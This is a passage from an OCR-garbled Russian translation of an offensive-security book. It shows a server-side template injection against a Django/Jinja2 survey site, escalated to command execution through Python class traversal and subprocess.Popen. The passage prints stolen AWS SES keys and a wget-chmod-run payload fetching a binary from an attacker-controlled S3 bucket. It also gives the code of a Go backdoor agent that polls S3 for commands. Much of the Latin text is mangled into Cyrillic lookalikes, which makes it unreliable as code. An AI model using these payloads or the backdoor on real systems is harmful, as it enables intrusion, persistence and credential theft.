Соподгаєи1аЁіопѕ оп ргойисё @ргодисЕ 
</р> 

# Шаблоны Јіпја или О)апдо 

<р> 

Соподгаєи1аёіопѕ оп ргодисе {{ргодис{}} 
</р> 


Это разделение между интерфейсом веб-проекта (визуализация 
в НТМІ./ауа$сгір?) и бэкендом (контроллер или модель в Рупоп/ВиБу/ 
Јауа) является краеугольным камнем многих сред разработки и мно- 
гих моделей командной работы. Самое интересное начинается, когда 
сам шаблон создается динамически с использованием ненадежных 
входных данных. Возьмем, к примеру, следующий код. Он создает 
динамический шаблон с помощью функции гепіег_Ёетр1аїе ѕїігіпо, 
которая сама создается с использованием пользовательского ввода: 


- -сокращено- - 
етр1аёе ѕїг = 
<аіу> 

<һ1>һе11о</һ1> 
<3>%5</һ3> 
</9іу> 
"и" % иѕег іприЁ 


гефигп гепӣег_Ёетр1аёе ѕЁгіпо(етр1аёе ѕїг) 


В этом фрагменте кода Ру оп, если бы мы внедрили допусти- 
мую директиву шаблона, такую как {{8*2}}, в переменную чзег_1п- 
риї, метод гепӣег_ёетр1аёе ѕгіпо оценил бы ее как 16, что означает, 
что страница отобразит результат 16. Хитрость в том, что у каждого 
шаблонизатора свой синтаксис, поэтому не все будут оценивать его 
именно так. Вто время как некоторые шаблонизаторы позволяют вам 
читать файлы и выполнять произвольный код, другие даже не позво- 
ляют выполнять простое умножение. 

Вот почему наша первая задача – собрать больше информации об 
этой потенциальной уязвимости. Нам нужно выяснить, с каким язы- 
ком мы имеем дело и какой фреймворк на нем работает. 


Поиск характерных признаков фреймворка 


С момента презентации 55ТП на конференции ВІаск Наї ОЅА 2015 зна- 
менитая диаграмма Джеймса Кеттла (рис. 6.4), изображающая спосо- 
бы снятия характерных признаков (отпечатков) среды шаблонизации, 
разошлась по всем статьям, посвященным уязвимости, которую вы 
можете встретить, в том числе и здесь. Чтобы изучить, как работает 
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механизм сбора отпечатков, мы введем несколько различных выра- 
жений в нашу форму опроса, и посмотрим, как они будут обработаны. 


Ѕтагќу 


24 


„о 


${*сотмеп*} К 


/ $" 2". )01п("аБ")} К 


${7*7} Јіпја2 


Уязвимости нет 


Рис. 6.4. Различные полезные нагрузки 55ТІ для выявления фреймворка шаблонизации 


Мы отправляем полезную нагрузку {{8*'2'}} и получаем в ответ 
электронное письмо, содержащее строку 2, повторенную всего восемь 
раз, как показано на рис. 6.5. Такое поведение типично для интерпре- 
татора Руфоп, в отличие, например, от интерпретатора РНР, который 
вместо этого вывел бы на печать 16: 


# Полезная нагрузка 
{{8*'2'}} # Руёћоп: 22222222, РНР: 16 


{{8*2}} # РуЕһоп: 16, РНР: 16 


ЕМА | СОМРОЅЕ | ТООІЅ | АВООТ | 


«Васкіоіпьох | Керіу | Еогуага | Ѕһоу Огівіпа] | 


ТһапК уоо Гог сопар!еНп$ Һе соѕпійуе ѕигуеу 


Егот: погер1ау@ѕигуеуѕапӣѕїаїѕ.сот, То: 4ау1А$ Вау’, Раїе 2019-10-27 12:13:53 


ТһапкК уоп Юг сотріеїіп= е ѕшуеу. Уопг соты Рибоп уі Вер 11$ адуапсе ћпап Кпо\Леазе, 
апа Бер оха а Бейег мой. 


Рис. 6.5. Типичный вывод Руѓћоп для входной строки 8* '2' 


Получив результат 2, мы приходим к выводу, что, скорее всего, 
имеем дело со знаменитым шаблоном Јіпја2, используемым в средах 
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РуШогп. Јіпја2 обычно работает в одном из двух основных веб-фрейм- 
ворков: Е!азК или Рјапео. Было время, когда беглый взгляд на заго- 
ловок НТТР-ответа 5егуег показывал, какой именно фреймворк сге- 
нерировал страницу. К сожалению, никто больше не выставляет свои 
приложения Е1аѕК/Пјапео в интернете в явном виде. Вместо этого вы- 
ходные данные проходят через серверы АрасВе и №етшх или, в данном 
случае, балансировщик нагрузки А\М/5, который заменяет исходный 
параметр 5егуег. 

Впрочем, расстраиваться рано. Существует быстрая полезная 
нагрузка, которая прекрасно работает как с шаблонами НазК, так 
и с "јапео Јіпја2, – это гедџеѕі.епуігоп. В обоих фреймворках этот 
объект РуШоп содержит информацию о текущем запросе: метод 
НТТР, заголовки, пользовательские данные и, что наиболее важно, 
переменные среды, загруженные приложением. 


# Полезная нагрузка 


етаі1=ауідѕһаи@рокетаі1. пеё&иѕег={ { гедиеѕЁ.епуігоп}}... 


На рис. 6.6 показан ответ, который мы получаем от этой полезной 
нагрузки. 


ЕМА. | СОМРОЅЕ | 1001$ | АВОИТ | 


«Вас іо іпьох | Керу | Еогуага | Во Огізіпа] 


ТБаок уои ѓог сотріейпе Ше согтиуе ѕигуеу 


Егот: по-герІу@ѕигуеуѕапӣѕїаїѕ.сот, То: дауійѕһауу, Рае 2019-10-27 14:09:35 


Нео {ЅЕКМЕВ ЅОҒТМАКЕ": М5615егуег/0.2', \м$91.тиргосезз': Рае, 'РҮЕМ№У РІК": /орі/ајапдо/ѕигуеуѕарр’, 
'ОЧЕРУ_ЗТЕМС': ", 'ЅЕКУЕК МАМЕ": 'АЭ8ОЕ8613СЕЕ15613', 'РУЕММ_МЕВЗЮМ:: 'ѕигуеуѕепу, М/ЅГЕМ\": ", 


Рис. 6.6. Ответ от гедие5{. епу1гоп 


В пути РҮЕМ№У ОТВ ясно видно слово Пјапео. Джекпот. Разработчи- 
ки этого приложения, похоже, решили заменить шаблонный движок 
Рјапео по умолчанию на более мощный шаблонный фреймворк Јіпја2. 
Здесь нам повезло, потому что хотя Јіпја2 поддерживает подмножест- 
во выражений и операций Руіћоп, которые дают ему преимущество 
сточки зрения функциональности и производительности, за эту гиб- 
кость приходится платить высокую цену: мы можем манипулировать 
объектами Руоп, создавать списки, вызывать функции и в некото- 
рых случаях даже загружать модули. 


Выполнение произвольного кода 


Очень заманчиво сделать рывок вперед и попытаться получить до- 
ступ к файлам паролей при помощи полезной нагрузки наподобие 
{{0$.ореп(' /еёс/раѕѕмӣ')}}, но это не сработает. Объект 0$ вряд ли 
определен в текущем контексте приложения. Мы можем взаимодей- 
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ствовать только с объектами и методами Руѓћоп, определенными на 
странице, отображающей ответ. Объект запроса, к которому мы обра- 
щались ранее, автоматически передается Ојапео в шаблон, поэтому 
мы можем естественным образом получить его. Что касается модуля 
0$, это крайне маловероятно. 

Но, к счастью, большинство современных языков программирова- 
ния предоставляют нам некоторую возможность самоанализа и реф- 
лексии - рефлексия представляет собой способность программы, 
объекта или класса исследовать себя, включая перечисление своих 
собственных свойств и методов, изменение их внутреннего состоя- 
ния и так далее. Это общая черта многих языков высокого уровня, 
таких как С#, Јауа, З\ЛЁ, и Рућоп не является исключением. Любой 
объект Рућоп содержит атрибуты и указатели на свойства собствен- 
ного класса и свойства его родителей. 

Например, мы можем получить класс любого объекта Руоп, ис- 
пользуя функцию __с1аѕ5__аїігібџиќе, которая возвращает допусти- 
мый объект Руіоп, ссылающийся на этот класс: 


# Полезная нагрузка 
етаі1=дауійѕһам@рокетаі1.пеё&иѕег={ {гедиеѕё__с1аѕ55_ }}... 


<с1аѕ5 'јапдо. соге. һапд1егѕ .м591.115СІВедиеѕі'> 


Этот класс сам по себе является дочерним классом объекта Руі!ћоп 
более высокого уровня 4) апдо.Нр.гедиез{.НЕЕрВедие$+. Нам даже не 
нужно читать документацию, чтобы узнать это; так написано в самом 
объекте, внутри переменной _ Базе__, как мы можем видеть с по- 
мощью следующей полезной нагрузки: 


# Рау1оай 


емаі1=дауідѕһам@рокетаі1.пеЁ&иѕег={ {гедиеѕё.__с1аѕ55__._ Баѕе__}}... 
<с1аѕѕ 'јапдо.һіЁр. гедџеѕё.НеЕрВедиеѕі'> 


етмаі1=дауійѕһам@рокетаі1.пеё&иѕег={ {гедиеѕї.__ с1аѕ5__. Баѕе _.  Баѕе }}... 
<с1аѕ5 'оБјесї'> Ө 


Мы продолжаем подниматься по цепочке наследования, добавляя 
__Базе__ к полезной нагрузке, пока не достигнем самого верхнего 
объекта Руоп Ө, родителя всех классов: објесі. Сам по себе класс 
оБјесї бесполезен, но, как и все другие классы, он также содержит 
ссылки на свои подклассы. Следовательно, после подъема по цепочке 
пришло время спуститься, используя метод __ѕ0Ьс1аѕѕеѕ__: 


# Полезная нагрузка 


етаі1=дауідѕһам@рокетаі1. пе{8изег={{гедиез*.__с1а$$__.__Базе__.__Базе__.__зи6с1а$5е$__()}}... 
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[<с1аѕѕ 
<с1а55 
<с1а55 
<с1а55 
<с1а55 
<с1а55 


'буре'>, 

"ісі ма\ие$'>, 
'ајапдо.соге.һҺапд\егѕ.м591.АтіёейЅёгеат'>, 
"ос1ЛАБ. гедџеѕї .Орепегрігесїог'>, 

'_Ғгогеп_ ітрог1АЬ. _ Модџ1еіоск'>, 
'зибргосе$$.Рореп'>, Ө 


- -сокрацщено- - 
<с1аѕ5 'йјапдо.сопїгіБ.аџћ.тоде15.АБѕёгасЏѕег.Меёа'>, 


] 


В результате мы видим более 300 классов. Это все классы, насле- 
дуемые непосредственно от класса ођјесї и загружаемые текущим 
интерпретатором РуПоп. 


ШЗ 38 В РуПоп 5 все классы верхнего уровня являются до- 
черними по отношению к классу ођјесї. В Руѓіћоп 2 классы должны явно 
наследовать класс оБјесі. 


Надеюсь, вы заметили класс зибргосе$$ .Рореп ®! Это класс, исполь- 
зуемый для выполнения системных команд. Мы можем вызвать этот 
объект прямо здесь и сейчас, сославшись на его смещение в списке 
подклассов, которое в данном конкретном случае оказывается чис- 
лом 282 (определено ручным подсчетом). Мы можем захватить вывод 
команды епу, используя метод соттипісаќе: 


# Полезная нагрузка 


етаі1=ауійѕһам@рокетаі1.пеё&иѕег={ {гедиеѕ+.__с1аѕ5__. Баѕе _. _ Баѕе _. ѕџиЬс1аѕѕеѕ_() 
[282] ("епу", ѕће11=Тгие, ѕйоџЁ=-1) .сотпипісаёе()[0]}}... 


Через пару секунд мы получаем электронное письмо, в котором 
выводятся переменные окружения процесса РуПоп, запущенного на 
машине: 


РИО=/ор+/9]апдо/зигуеузарр 

РУТНОМ_СЕТ_РТР_ 
$НА256=84412752ае26546а39а201ес618е{9е{7656с56248529с4сБеб0с9704с941409с 
КОВЕАМЕТЕЅ_ЅЕАМІСЕ РОВТ НТТР5=443 

НОМЕ= / гоо 

--Ѕпір- - 


Мы только что добились выполнения произвольного кода! Посмот- 
рим, что у нас есть полезного. Все настройки Юјапео обычно объявля- 
ются в файле с именем ѕЅеї#іп95.ру, расположенном в корне приложе- 
ния. Этот файл может содержать что угодно, от простого объявления 
адреса электронной почты администратора до секретных ключей 
АРІ. Из переменных среды мы знаем, что полный путь к приложению 
имеет вид /орі/Ојапдо/ѕигуеуѕарр, а файл настроек ѕеіёіпдѕ обычно 
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находится на один каталог ниже (с тем же именем). В листинге 6.1 мы 
пытаемся получить к нему доступ. 


Листинг 6.1. Попытка получить доступ к файлу настроек сайта зигуеузапа$а5.сот 


# Рау1оай 


етаі1=дауійѕһам@роКетаі1.пеё&иѕег={ {гедиеѕ#.__с1аѕѕ5__. Баѕе _. _ Баѕе _. ѕџиЬс1аѕѕеѕ_ () 
[282] ("саё /ор+/0јапдо/ѕигуеуѕарр/ѕигуеуѕарр/ѕеіїіпдѕ.ру", ѕһе11=Тгие, 
ѕіаӢоиЁ=-1). соттипісаёе() [9]}}... 


ВАЅЕ ОТВ = 


оѕ.раЁћ.дігпаме(оѕ.раЁћ.дігпаме(оѕ.раЁћ.арѕраһҺ(__ҒіЛе__))) 


ЗЕВ\МЕВ_ЕМАТЕ = "по-гер1ау@ѕигеуеуѕапіѕёаЁѕ. сот" 
ЅЕ5 ВО АССЕЅЅКЕҮ = "АКТА447ВК6И$$КОЗКЭР\" Ө 
ЅЕ5 КО ЅЕСАЕТКЕҮ = "МӨрОТУЗЕ1ОХпБуМЕОигМ29упхрода\кАОР1г0037" Ө 


--5пір- - 


Мы получаем некоторые учетные данные для 5Е5 ӨӨ (5ітріІе Етаії 
Ѕегуісе) – службы электронной почты, управляемой АМ$, которая 
предоставляет шлюз 5МТР, сервер РОРЗ и так далее. Это совершенно 
ожидаемо, так как основная деятельность приложения заключается 
в отправке результатов кандидатам по электронной почте. 

Эти учетные данные, вероятно, будут иметь очень ограниченные 
полномочия, например только отправку электронных писем. Впо- 
следствии мы можем попытаться проявить творческий подход и об- 
мануть некоторых администраторов, используя эту недавно приоб- 
ретенную возможность, но прямо сейчас эти учетные данные будут 
служить более важной цели. Мы убедимся, что зигуеузап${а{($.сот 
действительно принадлежит МХЕ Аа или, по крайней мере, работает 
в той же среде АМ5, что и раньше, прежде чем потратим на этот сайт 
свое драгоценное время. 


Подтверждение принадлежности сайта 


Возможно, вы помните, что мы нашли простенький веб-сайт ѕиг- 
уеузапа$(а($.сот, когда искали общедоступные заметки на Сіѕї 
и Раѕѓеђір в главе 4. Этот сайт может принадлежать совершенно от- 
дельной организации, не имеющей отношения к нашей истинной 
цели, поэтому нужна дополнительная проверка. Первым делом мы 
попытаемся получить идентификатор учетной записи, который на- 
ходится на расстоянии одного вызова АРІ и не требует какого-либо 
набора специальных разрешений, поэтому мы можем использовать 
только что найденные ключи 5Е5$. Каждый пользователь АМГ5 [АМ по 
умолчанию имеет доступ к этой информации. В листинге 6.2 для по- 
лучения идентификатора учетной записи мы используем ключ досту- 
па Ө и секретный ключ Ө, добытые при помощи кода из листинга 6.1. 


Листинг 6.2. Отслеживание идентификатора учетной записи 
5игуеузапа$а5.сот 


гооё@Роіпё1:~/# мі -/.ам$ /сгедеп\а1.$ 
[5е5] 
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амѕ_ассеѕѕ_Кеу 1 = АКТА447ВК6И$$КО$КЭР\ 
амѕ_ѕесгеЁ_ассеѕ5_Кеу = МорОТУЗЕ\ОХпБУМЕ0игМ79упх0099МКВУР1г0037 


гооЁ@Роіпї1:~/# амѕ $45 деё-са\1ег-ійепёі+у - -ргоЁіЛе ѕеѕ 


{ 

"ШѕегІа": "АТОААХ$ИКЗИ$9К610000\/", 

"Ассоип": "886371554408", 

"Агп": "агп:амѕ : Тат: :886477354405:05ег/5еѕ го _иѕег" 
} 


Все правильно: 886371554408 - это тот же идентификатор учетной 
записи АМ/Ѕ, который мы нашли для демонстрационного приложения 
МХК Ад в главе 5. Мы в деле! 


Бакеты для контрабанды 


Теперь нам остается закинуть на сервер жертвы обратную оболочку 
и спокойно выпить чашечку кофе, пока какой-нибудь плагин с экс- 
плойтом просеивает гигабайты данных в поисках паролей, секретов 
и других драгоценностей. Но жизнь не всегда столь благосклонна, как 
нам хотелось бы. 

Когда мы пытаемся загрузить любой файл из пользовательского 
домена, который мы создали в главе 3 как часть нашей атакующей 
инфраструктуры, запрос никогда не достигает цели: 


# Полезная нагрузка 


етаі1=дауіѕһам@рокетаі1.пеё&иѕег={ {гедиеѕё.__ с1аѕ5__. Баѕе _. Баѕе 
ѕибс1аѕѕеѕ_ () 

[282] ("идеё ВЕЕрз: //Ліпих-раскеіѕ -агсһіме.сот/гипссӣ; сһтой +х гипсс9; . / 
гипссӣ&", ѕһе11=Тгие, 

ѕійоџЁ=-1). сотпипісаёе() [91}}... 


<пусто> 


Похоже, что какой-то фильтр блокирует НТТР-запросы, идущие во 
внешний мир. Разумное предположение. Мы попробуем пойти в об- 
ратном направлении и запросим АР! метаданных 169.254.169.254. Эта 
конечная точка А\М/5 по умолчанию помогла нам собрать много ин- 
формации о демонстрационном приложении в главе 5. Надеюсь, она 
даст нам больше учетных данных для экспериментов... или нет: 


# Полезная нагрузка 


етаі1=ауійѕһаи@рокетаі1.пеє&иѕег={ {гедиеѕ.__с1аѕ5_.__Баѕе _.  Баѕе _.__ѕиБс1аѕѕеѕ_ () 
[282]("сиг1 Һёёр://169.254.169.254/1аеѕё", ѕһе11=Тгие, ѕйоџЁ=-1) .соппипісаёе()[0]}}... 


<пусто> 
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К сожалению, каждый раз, когда мы используем эту уязвимость 
58ТІ, мы запускаем отправку электронного письма с выводом коман- 
ды. Не очень-то скрытный вектор атаки. МХК А4$ отлично справи- 
лась с блокировкой исходящего трафика. Хотя это стандартная реко- 
мендация по безопасности, очень немногие компании на самом деле 
осмеливаются систематически внедрять фильтрацию трафика на 
своих машинах, главным образом потому, что она требует сложной 
настройки для обработки нескольких законных исключений, таких 
как проверка обновлений и загрузка новых пакетов. Бакет тхга@$-41, 
с которым мы познакомились в главе 5, теперь обретает смысл: он 
должен действовать как локальный репозиторий, хранящий все об- 
щедоступные пакеты, необходимые серверам. Такую среду поддер- 
живать непросто, но в подобных ситуациях она окупается. 

Однако один вопрос: как МХВ А4$ явно разрешает трафик в бакет 
тхгаа$-91? Группы безопасности (правила брандмауэра АМ) - это 
компоненты уровня 4, которые понимают только ІР-адреса, которые 
в случае бакета 53 могут меняться в зависимости от многих факторов. 
Каким образом веб-сайт ѕигуеуѕапіѕіаіѕ. соп может по-прежнему до- 
стигать бакета тхгадз-4], но не может отправлять пакеты в остальную 
часть интернета? 

Одно из возможных решений - внести в белый список весь диа- 
пазон ІР-адресов 53 в данном регионе, например 52.218.0.0/17, 
54.231.128.0/19 и т. д. Однако этот метод уродлив, в лучшем случае не- 
надежен и едва справляется со своей задачей. 

Более масштабируемый и подходящий для облачных технологий 
подход - создать конечную точку $3 УРС (подробнее см. ћїр5;//10с5. 
ауѕ.атағоп.сот/д!иеЛаїеѕ/ад/рс-епӣроіпіѕ-ѕ53.һіт!). Это проще, чем ка- 
жется: виртуальное частное облако (уігіиа1 ргіуаѓе сІоџа, УРС) - это 
изолированная частная сеть, из которой компании управляют свои- 
ми машинами. Его можно разбить на множество подсетей, как и лю- 
бой обычный интерфейс маршрутизатора. АМҮЅ может подключить 
специальный ОЋІ-адрес конечной точки к этому УРС, который будет 
направлять трафик к своим основным службам, таким как 55. Вмес- 
то того чтобы идти в обход через интернет, чтобы добраться до $53, 
машины в этом УРС будут связываться с этим специальным ОВГ- 
адресом, который направляет трафик через внутреннюю сеть Ата7оп 
для достижения $5. Таким образом, вместо внесения в белый список 
внешних [Р-адресов можно просто внести в белый список внутренний 
диапазон УРС (10.0.0.0/8), что позволит избежать проблем с безопас- 
ностью. 

Однако дьявол кроется в мелочах, поскольку конечная точка УРС 
всегда знает только о службе АМ, к которой пытается подключить- 
ся машина. Ее не волнует бакет или файл, который она ищет. Бакет 
может даже принадлежать другой учетной записи АМ, и трафик все 
равно будет проходить через конечную точку УРС к месту назначе- 
ния! Таким образом, технически, даже несмотря на то, что МХВ Аб, 
казалось бы, изолировала опросное приложение от интернета, мы все 
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равно можем тайком передать запрос в бакет в нашей собственной 
учетной записи АМГ$ и заставить приложение запустить наш испол- 
няемый файл. Давайте проверим эту теорию. 

Мы загрузим фиктивный НТМГ-файл с именем БеасопТез{. т. 
в один из наших бакетов и сделаем его общедоступным, предоставив 
разрешение беЁоБјесі всем. 

Сначала мы создаем бакет с именем мхгайѕ-агсһіуеѕ-раскеЁѕ -11 - 
пих: 


гооЁ@Роіпё1:~/# амѕ 53арі сгеаёе-Бискеё \ 
--БисКеЕ мхгайѕ-агсһћіуеѕ-раскеЁѕ -11пих \ 
- -гедіоп=еџи-меѕ-1 \ 

- -сгеаёе-БискеЁ-сопҒідигаёіоп \ 
ІосаіопСопѕЁгаіпё=еџ-неѕЁ-1 


Затем мы загружаем фиктивный файл в наш бакет и называем его 
БеасопТеѕіё.һЕм1: 


гооЁ@Роіпї1:~/# амѕ 53арі риё-оБјесі \ 
--БисКеЕ мхгайѕ-агсћіуеѕ-раскеёѕ-11пих \ 
--Кеу БеасопТеѕЕ.һЕті \ 

--Боду БеасопТеѕі.һЕпІ. 


Далее мы делаем этот файл общедоступным: 


гооЁ@Роіпї1:~/# амѕ 53арі риё-БискеЁ-ро1ісу \ 
--БисКеЕ мхгайѕ-агсһћімеѕ-раскеёѕ-11пих \ 
--ро\ісу ҒіЛе: //<(саё <<ЕОЕ 
{ 
“Іа”: “Ро11су1572645198872”, 
“Мегѕіоп”: “2012-10-17”, 
“сфафетепе”: [ 
{ 
“614°: “51т1572645197096”, 
“Ас+іоп”: [ 
“53:бе+0Ьјесі”, “53:РиЁ0ОЬјес+” 
1, 
“ЕҒҒес”: “АДом”, 
“Везоигсе”: “агп:аиз: $3: : : тхгайѕ-агсһімеѕ-раскеёѕ-1іпих/*”, 
«Ргіпсіра1»: «*» 


} 
ЕОЕ) 


Наконец, мы переходим к получению файла БеасопТеѕё.һіпІ через 
веб-сайт ѕигуеуѕапіѕ+аЁѕ . сот. Если все работает так, как ожидалось, 
мы должны получить в ответ фиктивный НТМГ-контент: 
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# Полезная нагрузка для сайта зигуеузап9${а{$ 


етаі1=дауіаѕһам@рокетаі1.пеЁ&ёџиѕег={{гедиеѕ. _с1а$$__.__Базе__.__Базе__.__зи6с1а$ез__() 
[282](" сиг Верь: //тхгайѕ-агсһімеѕ -расКе{$-1Лпих.$3-еи-мез{-1.амагопаи$ .сом/БеасопТе${. Вт, 
ѕһе11=Тгие, ${490и*=-1).сотмиптса&е()[0]}}... 


# Результат в электронной почте 
<ҺЕт1>Һе11о гот БеасопТеѕі. һт1</һҺЕті> 


Это был долгий путь, но он привел к цели! Мы нашли надежный 
способ общения с внешним миром с помощью этого закрытого при- 
ложения для проведения опросов. Используя файлы $3, теперь мы 
можем разработать квазиинтерактивный протокол для выполнения 
кода на этой изолированной машине. 


Качественный бэкдор с использованием $5 


Мы разработаем систему агент-оператор, чтобы легко выполнять код 
и получать результаты на машине, обслуживающей сайт зигуеузапа- 
5фа{$.сом. Первая программа на нашем сервере, известная как опе- 
ратор, будет записывать команды в файл с именем һе\10 гед.іхі. 
Вторая программа, работающая на сайте опроса, именуемая агент, 
будет получать НеДо_гед.+х* каждые пару секунд, выполнять его со- 
держимое и загружать результаты в файл һе\1о_ геѕр.іхі на 53. Наш 
оператор регулярно проверяет этот файл и распечатывает его содер- 
жимое. Этот обмен показан на рис. 6.7. 


ћео 


есһо һе11о 


Приложение 
для опросов 


Рис. 6.7. Выполнение команды через файлы 53 


Оператор будет иметь полный доступ к бакету тхгайѕ-агсһімеѕ - 
раскеіѕ -1іпих, поскольку он будет работать на нашем собственном 
доверенном сервере с необходимыми учетными данными АМ. Аген- 
ту требуется только разрешение Риї0Ьјесё для файла НеДо_гезр. хі 
и беоЬјесі для файла Вео_гед.{х+. Таким образом, даже если ана- 
литик подойдет слишком близко, он сможет просмотреть только по- 
следнюю отправленную команду, а не фактический ответ. 
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Чтобы удовлетворить наши самые отьявленные са- 
дистские и параноидальные наклонности, мы могли бы также добавить 
политики жизненного цикла 55 для автоматического удаления файлов 
через несколько секунд (поищите управление жизненным циклом обе- 
екта на һї1рѕ ;//10сѕ.а%ѕ.атағоп.сот/) и зашифровать данные с помощью 
динамических ключей, сгенерированных во время выполнения. 


Я сделал базовую реализацию оператора и агента, доступную на 
СіёНир по адресу /1р5;//9/ћир.сот/ѕрагсїои/Наскі ікеАСһоѕ Хгее/таѕїег/ 
53Васкаоог, на случай, если вы хотите поиграть с ними, настроить их 
и добавить новые возможности. Мы рассмотрим некоторые основные 
моменты кода в следующих разделах. 


Создание агента 


Если вы заглянули в репозиторий, то могли заметить, что я решил на- 
писать агент на Со|ап®, потому что он быстрый, дает статически свя- 
занный исполняемый файл и намного производительнее и удобнее, 
чем С/С++. Функция таіп задает необходимые переменные, такие как 
имена файлов и НТТР-коннектор, а затем входит в основной цикл, 
как показано в листинге 6.3. 


Листинг 6.3. Настройка переменных агента 


Ғипс таїіп() { 
гедивЕ := ҒпЕ. ЅргіпЕ?("Һеёрѕ : //%5.53.атагопамѕ.сот/%5 гед. хі", *БисКеф, *Кеу) 
гезривЕ := Рё. ЅргіпЕғ("Һеёрѕ: //%5.53.атагопамѕ.сот/%5_геѕр.їхё", *рискеї, *Кеу) 


с1іепі := &ћієр.С1леп{} 


Наше взаимодействие с 53 будет осуществляться через НТТР- 
запросы КЕЅТ (СЕТ для получения контента и РОТ для загрузки дан- 
ных), чтобы избежать странного совпадения разрешений с ролью 
машины. Загляните на страницу этой книги по адресу ћіїрѕ ;//поѕѓагсћ. 
сот/һом-һаск-дһоѕі/, чтобы узнать о соответствующей политике $3. 

В листинге 6.4 мы указываем агенту загружать данные для выпол- 
нения из гедВі, выполняя метод Ёеісһ0аёа каждые две секунды. 


Листинг 6.4. Загрузка данных 


Рог { 
іме. 51еер(2 * {1ме.5есопа) 
сті, ефад, егг = Ғеёсһраёа(с1іепі, гедуВі, еёад) 
- -сокращено- - 
до Ёипс() { 
оцфриЕ := ехесСті(стӣ) 
1Ғ Теп(оџёриё) > 0 { 
ир1оадраёа(с1іепё, гезруВЁЕ, оџїриё) 
} 
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Если файл был изменен с момента последнего посещения (код со- 
стояния НТТР 200 указывает на изменение), то новые команды до- 
ступны для выполнения с помощью метода ехесСпд. В противном слу- 
чае мы получаем ответ НТТР 304 (№1 Моаіћбеа) и повторяем попытку 
через несколько секунд. 


ПВ Я не буду вдаваться в заголовки ЕТав, но если вы хоти- 
те узнать больше, почитайте о них на сайте Һ11рѕ:;/Лм.І09ісБід.соту/. 


Затем результаты отправляются обратно в корзину (через метод 


ир1оадраќѓа). В следующем фрагменте кода, показанном в листинге 6.5, 
показано определение этого метода. 


Листинг 6.5. Метод агента иріоаараѓа 


Ғипс ир1оадраа(с1іепё *ћёёр.С1лепё, игі ѕёгіпд, даа []Буёе) еггог { 


гед, егг := һёёр.№емВедиеѕ&( "РОТ", иг, Буёеѕ.№емеайег(даёа)) 
гед.Неайег .Ааа("х-атг-ас1", "БискеЁ-омпег- ҒОЛ -сопёго1") 

_, егг = с1лепё.ро(гед) 

гефигп егг 


Метод ир1оайраїа – это классический НТТР-запрос РОТ, но здесь 
у нас есть одна небольшая дополнительная тонкость: заголовок 
х-ат2-ас|. Этот заголовок указывает АМ передать право собственно- 
сти на загруженный файл владельцу целевого сегмента, то есть нам. 
В противном случае файл сохранит свое первоначальное право соб- 
ственности, и мы не сможем использовать АРІ 53 для его извлечения. 
Если вам интересно узнать об анатомии функций ехесСта, Ғеісһ0аёа 
и ир1оадраѓа, ознакомьтесь с кодом в файловом архиве книги. 

Первое важное требование при написании такого агента – стабиль- 
ность. Мы сбросим его в тыл врага, поэтому нам нужно правильно 
обрабатывать все ошибки и исключения. Неправильно обработанное 
исключение может привести к сбою агента, а вместе с ним и нашего 
удаленного доступа. Кто знает, останется ли уязвимость внедрения 
шаблона на следующий день? 

Со]апе заботится об исключениях очевидным способом - старается 
не иметь их вообще. Большинство вызовов возвращают код ошибки, 
который следует проверить, прежде чем двигаться дальше. Пока мы 
неукоснительно следуем этой практике, наряду с парой других хоро- 
ших методов кодирования, таких как проверка нулевых указателей 
перед разыменованием, мы должны быть в относительной безопас- 
ности. Второй важный момент - параллелизм. Мы не хотим потерять 
программу лишь из-за того, что она занята выполнением команды 
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Ғіпа, которая истощает ресурсы агента в течение 20 минут. Вот поче- 
му мы инкапсулировали методы ехесСта и ир1оайраѓа в параллелиза- 
тор языка Со (гогои те, префикс до Фипс()...). 

Параллелизатор Со можно рассматривать как набор инструкций, 
выполняемых параллельно остальной части кода. Все подпрограммы 
совместно используют тот же поток, что и основная программа, та- 
ким образом экономя несколько структур данных и дорогостоящее 
переключение контекста, обычно выполняемое ядром при переходе 
от одного потока к другому. Чтобы вы понимали масштаб - паралле- 
лизатор выделяет около 4 КБ памяти, тогда как поток ОС занимает 
примерно 1 МБ. Вы можете легко запускать сотни тысяч параллелиза- 
торов на обычном компьютере, и он даже не заметит этого. 

Мы компилируем исходный код в исполняемый файл с именем 
гипс94 и загружаем его в нашу корзину 53, где он будет надежно хра- 
ниться, готовый к работе: 


гооЁ@Роіпї1:~/# ді с1опе ВЕЕрз: / /9іЕһиЬ. соп/НасКкЕ\КеАдРогп${аг /бгезспРо 11 со 
гоо@Ро\п{1:-/# сӯ $ЗВасКдоог /53Адепё 

гооєёРоіпё1:~/# до Би 4 -191а9$=”-$ -м” -о . /гипсій таіп.до 

гооЁ@Роіпї1:~/# амѕ 53арі риё-оБјесі \ 

--БисКеЕ мхгайѕ-агсһћімеѕ-раскеёѕ-11пих \ 

--Кеу гипсій \ 

--Боду гипсай 


Одна из немногих раздражающих вещей в Со заключается в том, 
что он засоряет окончательный двоичный файл символами, путями 
к файлам и другими компрометирующими данными. Мы убрали не- 
которые символы с помощью флага -$ и подкорректировали инфор- 
мацию с помощью -м, но знайте, что аналитик группы кибербезопас- 
ности может раскопать много информации о среде, используемой для 
создания этого исполняемого файла. 


Создание оператора 


Код оператора следует очень похожей, но обратной логике: он от- 
правляет команды и извлекает результаты, имитируя интерактивную 
оболочку. Вы найдете код - на этот раз на Руоп - в том же файловом 
архиве: 


гооЁ@Роіпї1:~/530р/# руёћоп таіп.ру 

ЅЕаг+іпд а 1оор Ғеёсһіпд геѕи15 Ғгот 53 тхгайѕ-агсһіуеѕ-раскеїѕ-1іпих 
Очеце іп соттапӣѕ ёо Бе ехеси*ед 

ѕһе11> 


Далее мы переходим к нашей уязвимой форме на сайте ѕигуеуѕапа- 
ѕќаїѕ.сот и отправляем следующую полезную нагрузку для загрузки 
и запуска агента: 
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# Полезная нагрузка для формы на сайте ѕигуеуѕапаѕЁаЁѕ 


етаі1=дауійѕһам@роКетаі1.пеЁ&иѕег={ {гедиеѕ+.__с1аѕ5__. Баѕе _. _ Баѕе _. ѕџирс1аѕѕеѕ_ () 
[282] ("иде ВЕЁрэ: //тхгайѕ-агсһімеѕ-раскеЁѕ -11пих.53-еџ-меѕЁ-1. атагопамѕ. сот/гипсаа %3В 
сһтоа %2Вх гипса %3В ./гипс99%26, ѕће11=Тгие, ѕЁйоџё=-1). соттипісаёе() [01}}... 


В декодированном виде полезная нагрузка состоит из нескольких 
строк: 


мде һё&рѕ: //тхгайѕ-агсһіуеѕ -раскеїѕ -1іпих.53-еџ-меѕї-1. атагопамѕ. сот/гипсій 
сһтоа +х гипс99 
./гипсаа & 


Затем мы запускаем оператор на нашей машине: 


